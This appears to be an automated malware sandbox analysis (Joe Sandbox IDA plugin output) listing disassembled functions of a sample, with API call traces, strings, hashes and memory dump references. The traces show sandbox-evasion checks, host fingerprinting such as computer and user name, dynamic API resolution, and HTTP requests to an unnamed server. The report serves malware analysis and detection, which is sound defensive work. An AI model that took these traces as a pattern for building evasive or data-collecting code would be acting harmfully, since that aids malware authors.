Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

Part of subcall function 007451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00745228

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

Part of subcall function 007452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00745318
Part of subcall function 007452C0: lstrlenA.KERNEL32(00000000), ref: 0074532F
Part of subcall function 007452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00745364
Part of subcall function 007452C0: lstrlenA.KERNEL32(00000000), ref: 00745383
Part of subcall function 007452C0: strtok.MSVCRT(00000000,?), ref: 0074539E
Part of subcall function 007452C0: lstrlenA.KERNEL32(00000000), ref: 007453AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0074578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00745940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00745A0C
Sleep.KERNEL32(0000EA60), ref: 00745A1B

Strings

ERROR, xrefs: 0074577D
ERROR, xrefs: 00745932
ERROR, xrefs: 00745849
ERROR, xrefs: 00745693
ERROR, xrefs: 00745636
ERROR, xrefs: 007459FE

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3630751533-2791005934
Opcode ID: 0738c301669ee86c610a830e408c4394f35adb0e7a17460b32dc781d92fb9287
Instruction ID: d939a94f27319c01a19431612def871eeaf27ba9c0049f8f656bcd2899b21e5f
Opcode Fuzzy Hash: 0738c301669ee86c610a830e408c4394f35adb0e7a17460b32dc781d92fb9287
Instruction Fuzzy Hash: 21E11172950104EBEB15FBB0DC9AAED737CAF94300F508528B51666192EF3C6B4DCB92

Function 007452C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 138
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

Part of subcall function 00736280: InternetOpenA.WININET(00750DFE,00000001,00000000,00000000,00000000), ref: 007362E1
Part of subcall function 00736280: StrCmpCA.SHLWAPI(?,00FCD800), ref: 00736303
Part of subcall function 00736280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00736335
Part of subcall function 00736280: HttpOpenRequestA.WININET(00000000,GET,?,00FD18A0,00000000,00000000,00400100,00000000), ref: 00736385
Part of subcall function 00736280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007363BF
Part of subcall function 00736280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007363D1

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00745318
lstrlenA.KERNEL32(00000000), ref: 0074532F

Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52

StrStrA.SHLWAPI(00000000,00000000), ref: 00745364
lstrlenA.KERNEL32(00000000), ref: 00745383
strtok.MSVCRT(00000000,?), ref: 0074539E
lstrlenA.KERNEL32(00000000), ref: 007453AE

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Strings

ERROR, xrefs: 007453B9
ERROR, xrefs: 007454A9
ERROR, xrefs: 0074530A
ERROR, xrefs: 0074546F
ERROR, xrefs: 00745432

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3532888709-1526165396
Opcode ID: d1a6d7a3da220d2c3299cc8ded9df31d33b604ae6ca26933cdb3d67c989b3cbb
Instruction ID: 20cddf9eb6b06456f989c3c887f8560e29d291f50e7def6b90c59830b1ef22ea
Opcode Fuzzy Hash: d1a6d7a3da220d2c3299cc8ded9df31d33b604ae6ca26933cdb3d67c989b3cbb
Instruction Fuzzy Hash: 84512E70954148EBEB18FF60CD9AAED7779EF50305F504028F80A5B192EF386B45CB62

Function 00747500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00747542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0074757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747603
HeapAlloc.KERNEL32(00000000), ref: 0074760A
wsprintfA.USER32 ref: 00747640

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Strings

\, xrefs: 00747560
C, xrefs: 0074754C
:, xrefs: 0074755C

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 1aaa221617ebd7d13cdb5689b00eab069ca6bbbf3411f64960102b5abaab6e1a
Instruction ID: 23b634493e773334394aa06b5a73aa5c6b395422f22b088f494553b94769600f
Opcode Fuzzy Hash: 1aaa221617ebd7d13cdb5689b00eab069ca6bbbf3411f64960102b5abaab6e1a
Instruction Fuzzy Hash: 8D4182B1D04248EBDB14DF94DC49BEEBBB8EF48704F104199F5096B280D7786A84CFA6

Function 007469F0 Relevance: 10.6, APIs: 7, Instructions: 89
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2CB0), ref: 007498A1
Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2DA0), ref: 007498BA
Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2B78), ref: 007498D2
Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2DE8), ref: 007498EA
Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2D28), ref: 00749903
Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC1538), ref: 0074991B
Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FBAC68), ref: 00749933
Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FBACE8), ref: 0074994C
Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2CE0), ref: 00749964
Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2D40), ref: 0074997C
Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2C08), ref: 00749995
Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2B48), ref: 007499AD
Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FBAD28), ref: 007499C5
Part of subcall function 00749860: GetProcAddress.KERNEL32(76210000,00FC2BD8), ref: 007499DE

Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788

Part of subcall function 007311D0: ExitProcess.KERNEL32 ref: 00731211

Part of subcall function 00731160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00746A17,00750AEF), ref: 0073116A
Part of subcall function 00731160: ExitProcess.KERNEL32 ref: 0073117E

Part of subcall function 00731110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00746A1C), ref: 0073112B
Part of subcall function 00731110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00746A1C), ref: 00731132
Part of subcall function 00731110: ExitProcess.KERNEL32 ref: 00731143

Part of subcall function 00731220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0073123E
Part of subcall function 00731220: __aulldiv.LIBCMT ref: 00731258
Part of subcall function 00731220: __aulldiv.LIBCMT ref: 00731266
Part of subcall function 00731220: ExitProcess.KERNEL32 ref: 00731294

Part of subcall function 00746770: GetUserDefaultLangID.KERNEL32(?,?,00746A26,00750AEF), ref: 00746774

GetUserDefaultLCID.KERNEL32 ref: 00746A26

Part of subcall function 00731190: ExitProcess.KERNEL32 ref: 007311C6

Part of subcall function 00747850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007311B7), ref: 00747880
Part of subcall function 00747850: HeapAlloc.KERNEL32(00000000,?,?,?,007311B7), ref: 00747887
Part of subcall function 00747850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0074789F

Part of subcall function 007478E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00746A2B), ref: 00747910
Part of subcall function 007478E0: HeapAlloc.KERNEL32(00000000,?,?,?,00746A2B), ref: 00747917
Part of subcall function 007478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0074792F

Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12

Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00FC1558,?,0075110C,?,00000000,?,00751110,?,00000000,00750AEF), ref: 00746ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00746AE8
CloseHandle.KERNEL32(00000000), ref: 00746AF9
Sleep.KERNEL32(00001770), ref: 00746B04
CloseHandle.KERNEL32(?,00000000,?,00FC1558,?,0075110C,?,00000000,?,00751110,?,00000000,00750AEF), ref: 00746B1A
ExitProcess.KERNEL32 ref: 00746B22

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 3511611419-0
Opcode ID: a4c3a082021ee2928e9e3d8e5b5911388e16186d1a6c02c5edb5a88e3cf49f8c
Instruction ID: 3c962c896f51c683667334b0e0a514eb7053d6094ae2cee60751391bf8477403
Opcode Fuzzy Hash: a4c3a082021ee2928e9e3d8e5b5911388e16186d1a6c02c5edb5a88e3cf49f8c
Instruction Fuzzy Hash: F1312B71A54208FAEB05FBF0DC5ABFE7778AF44301F504528F612A2192DF786945C6A2

Function 007347B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 007347EA
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734801
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00734818
lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00734839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849

Strings

<, xrefs: 007347C9

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: b64e0f8979ed0cac290d77c352e8e7ad958330ed724bed06d06418289be69903
Instruction ID: 3b381c178e7d2400591628095e20210c11e3e26a4d249809ea655383d6cd1658
Opcode Fuzzy Hash: b64e0f8979ed0cac290d77c352e8e7ad958330ed724bed06d06418289be69903
Instruction Fuzzy Hash: 902118B1D00209ABDF14DFA4E849ADD7B74FB44320F108225F925A7290EB746A05CF91

Function 00731220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0073123E
__aulldiv.LIBCMT ref: 00731258
__aulldiv.LIBCMT ref: 00731266
ExitProcess.KERNEL32 ref: 00731294

Strings

@, xrefs: 00731233

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 0de3474a3a94c2950dfc23839dde7378338412f4c76bca19ada8c88e6b523c11
Instruction ID: 09b175ffe8ae989d59285de05c75f9a5f4d4f98636c2d294dc9a01ef0cc37a9c
Opcode Fuzzy Hash: 0de3474a3a94c2950dfc23839dde7378338412f4c76bca19ada8c88e6b523c11
Instruction Fuzzy Hash: 05011DB0E44308FAEB10EFE4CC49BAEBB78BB54705F608048E705B62C2D77859458799

Function 00746AF3 Relevance: 6.0, APIs: 4, Instructions: 30
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00FC1558,?,0075110C,?,00000000,?,00751110,?,00000000,00750AEF), ref: 00746ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00746AE8
CloseHandle.KERNEL32(00000000), ref: 00746AF9
Sleep.KERNEL32(00001770), ref: 00746B04
CloseHandle.KERNEL32(?,00000000,?,00FC1558,?,0075110C,?,00000000,?,00751110,?,00000000,00750AEF), ref: 00746B1A
ExitProcess.KERNEL32 ref: 00746B22

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: e0808568fd3b39c2d53992ed5299e8173511c8f9c2dac56e3c19d5d2c1f2e8c5
Instruction ID: c86c5ed664a4b292961808e48201069c8dd12d068c3612c546b36204b14078f6
Opcode Fuzzy Hash: e0808568fd3b39c2d53992ed5299e8173511c8f9c2dac56e3c19d5d2c1f2e8c5
Instruction Fuzzy Hash: 07F08CB0A44219EFE700BBA0DC0ABBE7B74FB05701F208914F517E11C1CBB85980EAA7

Function 007451F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6

Part of subcall function 00736280: InternetOpenA.WININET(00750DFE,00000001,00000000,00000000,00000000), ref: 007362E1
Part of subcall function 00736280: StrCmpCA.SHLWAPI(?,00FCD800), ref: 00736303
Part of subcall function 00736280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00736335
Part of subcall function 00736280: HttpOpenRequestA.WININET(00000000,GET,?,00FD18A0,00000000,00000000,00400100,00000000), ref: 00736385
Part of subcall function 00736280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007363BF
Part of subcall function 00736280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007363D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00745228

Strings

ERROR, xrefs: 0074521A
ERROR, xrefs: 00745273

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 9de274fdab7c37d941dd4e74f3ac58120f82581ee76c71d32b14f6309a566074
Instruction ID: 55f0343d3ab0633f3c8879b8e0510179efe92ed3a876b5dff0e89ad16d8747e0
Opcode Fuzzy Hash: 9de274fdab7c37d941dd4e74f3ac58120f82581ee76c71d32b14f6309a566074
Instruction Fuzzy Hash: 50113070954108FBEB14FF60DD5AAED7378AF50300F808168F81A4B593EF78AB05CA92

Function 007478E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00746A2B), ref: 00747910
HeapAlloc.KERNEL32(00000000,?,?,?,00746A2B), ref: 00747917
GetComputerNameA.KERNEL32(?,00000104), ref: 0074792F

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: ee6799184f4c620852192f5ce842fb059cabfd293b4a98872a55dce56dbe9be5
Instruction ID: 4bf99e4a2162ace0dee3c91cc3f3181fdbd530fd35d86be21e1fcf2fccb23127
Opcode Fuzzy Hash: ee6799184f4c620852192f5ce842fb059cabfd293b4a98872a55dce56dbe9be5
Instruction Fuzzy Hash: 6001A9B1A48204EFC714DF94DD45BAEBBB8F744B11F104259F945E3380D3785944CBA2

Function 00731110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00746A1C), ref: 0073112B
VirtualAllocExNuma.KERNEL32(00000000,?,?,00746A1C), ref: 00731132
ExitProcess.KERNEL32 ref: 00731143

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: fda138dc8707a486fb32e22746b73f1118ac211c58c3760a706bf05db238c3a5
Instruction ID: ea235291968408c753d9373cbc1c96bf51099d91a7eed52d787dfea0e9e7e105
Opcode Fuzzy Hash: fda138dc8707a486fb32e22746b73f1118ac211c58c3760a706bf05db238c3a5
Instruction Fuzzy Hash: 14E0867195930CFBE7106BA09C0EB4C7778AB44B02F500054F70C761C0D6B42640A69A

Function 007310A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0073114E,?,?,00746A1C), ref: 007310B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0073114E,?,?,00746A1C), ref: 007310F7

Memory Dump Source

Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

